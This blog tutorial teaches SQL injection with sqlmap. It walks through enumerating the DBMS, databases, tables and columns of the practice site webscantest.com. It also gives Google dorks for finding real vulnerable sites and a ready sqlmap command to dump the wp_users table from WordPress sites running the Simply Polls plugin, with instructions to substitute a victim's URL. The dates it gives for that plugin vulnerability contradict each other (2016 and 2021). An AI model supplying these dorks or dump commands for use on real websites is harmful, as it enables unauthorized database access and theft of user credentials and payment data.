top of page
Writer's picturealvin gitonga

Sqlmap šŸ˜ˆ: Hacking MySQL & WordPress SitesšŸ˜‰ with SQL Injection šŸ’‰

Updated: Nov 30, 2022

CyberMoransšŸ¤—

SQL Injection šŸ’‰ is one of the most prevalent and common attack on websites. Nearly every website has a database behind it containing confidential and valuable information šŸ§ that can often be compromised by a well-designed SQL injection attack šŸ˜ˆ

There are tonnes of SQL injection tools, but the most popular is sqlmap. In this tutorial, we will use sqlmap to compromise a MySQL database behind a website šŸ˜‹

Generally, MySQL is teamed up with PHP and an Apache web-server (often referred to as LAMPP) to build dynamic, database-driven web sites šŸ˜‹. Such content management and development packages as Drupal, Joomla, Wordpress, Ruby on Rails and others use MySQL as their default backend database. Millions of websites have MySQL backends and very often they are "homegrown" websites, without much attention to security šŸ˜

In this post, a look into extracting information about an online MySQL database before we actually extract information from the database.


Sqlmap can be used for databases other than MySQL, such Microsoft's SQL Server and Oracle, but here we will focus its capabilities on those ubiquitous web sites that are built with PHP, Apache and MySQL such as WordPress, Joomla and Drupal šŸ§


So, Morans, Lets ndu THIS!...šŸ’Ŗ


Ā 

Start sqlmap šŸš€

First, fire up Kali and go to Applications > Database Assessment > sqlmap, When you click on sqlmap, you see -- šŸ‘‡


šŸš€ Find a Vulnerable WebSitešŸ§

To get into the website and, ultimately the database, we are looking for web sites that end in "php?id=xxx" where xxx represents some number. If you are familiar with google hacks/dorks can do a search on google by entering:

  • inurl:index.php?id=

  • inurl:gallery.php?id=

  • inurl:post.php?id=

  • inurl:article?id=

These šŸ‘† dorks will bring up millions of web sites with this basic vulnerability criteria. If you are creative and ambitious, you can find numerous web sites that list vulnerable web sites. You might want to check these outšŸ˜‰


For us here, we will be hacking a website designed for this purpose, www.webscantest.com. You can practice on this web site and refine your skills without worrying about breaking any laws and selling a plot to make bail moneyšŸ¤£


Sqlmap is a powerful tool, written in Python, it has so many options. We will just be scratching the surface of its capabilities in this Proof of concept šŸ¤­


šŸš€ Determine the DBMS Behind the WebSitešŸ§

Before we begin hacking a web site, we need to gather information.


Let's begin by finding out what the DBMS is behind this web site.

on the terminal type šŸ‘‡

sqlmap -u "the entire URL of the vulnerable web page"

thus šŸ‘‡

sqlmap -u "http://www.webscantest.com/datastore/ search_get_by_id.php?id=4"

PS: The entire URL is enclosed in double quotation marks (") -- šŸ‘‡

sqlmap returns results like that below -- šŸ‘‡. Notice highlighted is the web site backend using MySQL 5.0šŸ‘‡


šŸš€ Find the DatabasešŸ§

Now that we know what the database management system (DBMS) is MySQL 5.0, we need to know what databases it contains. sqlmap can do that. We take the command used above and append it with --dbs, like -- šŸ‘‡

sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs

Running this command against www.webscantest.com we get the results like -- šŸ‘‡

Notice the two available databases, information schema and webscantest. Information schema is included in every MySQL installation and it includes information on all the objects in the MySQL instance, but not data of our interest. Although it can be beneficial to explore that database to find objects in all the databases in the instance, our attention is on the other database here, webscantest, that may have some valuable information. Let's dig some further -- šŸ˜‹


šŸš€ Digging More Info from the DatabasešŸ§

So, the DBMS is (MySQL 5.0) and the name of a database of interest (webscantest). The next step is to try to determine the tables and columns in that database. In this way, we will have some idea of:

  1. what data is in the database,

  2. where it is and

  3. which type of data it contains (numeric or string).


All of this šŸ‘† information is critical and necessary to extracting the data. To do this, we need to make some small edits to our sqlmap command. Everything else we have used above remains the same, but now we tell sqlmap we want to see the tables and columns from the webscantest database.


We can append our command with --columns -D and the name of the database, webscantest such as -- šŸ‘‡


sqlmap -u "http://www.webscantest.com/datastore/search_get_by_id.php?id=4" --dbs --columns -D webscantest

Sqlmap šŸ‘† will target the webscantest database and attempt to enumerate the tables and columns in this database. As you can see below, sqlmap successfully was able to enumerate three tables;

  1. accounts,

  2. inventory, and

  3. orders, complete with column names and datatypes.

Not Bad eeh! šŸ‘‡


See šŸ‘† that the orders table above includes credit card numbers, expiration dates and CVVšŸ¤Æ In the next one, I'll show you how to extract that informationšŸ’€

Ā 

šŸ¤– Complex/Modern sqlmap Attack on WordPress Sites ā˜ ļø

A more advanced use of this tool; On December, 2016, a security researcher (Tad Group) found a vulnerability to an advanced SQL injection attack against WordPress websites that include the plug-in Simply Polls (https://wordpress.org/plugins/simply-polls/) .


Since this attack was just recently released (2021) and the millions of users have not yet patched, most of these sites are vulnerablešŸ˜Ø


The sqlmap command to exploit those WordPress sites with Simply Polls plug-in is šŸ‘‡

sqlmap -u "http://example.com/wp-admin/admin-ajax.php"--data="action=spAjaxResults&pollid=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Replace "example.com" with the URL of the vulnerable website.

Sqlmap can be very versatile and useful tool for MySQL, as well as MS SQL Server and Oracle database hacking šŸ„¶


For the next part, we extract this data from the db. Dont miss it...click here to proceed to part 2šŸ˜‹


Ā 

Conclusion šŸ¤–

Subscribe to receive notifications of similar posts šŸ˜‹ where we will be reverse engineering malware and the technical aspect of vulnerabilities as well as how an attacker may use this vulnerability as an attack vector and other Infosec stuff...šŸ˜‹


Morans,

Thank you for your time, Like and leave a comment/review and as always, stay awesome! šŸ˜‹šŸ‘Š šŸ’Ŗ

1,993 views0 comments

Recent Posts

See All

Comments


Post: Blog2_Post
bottom of page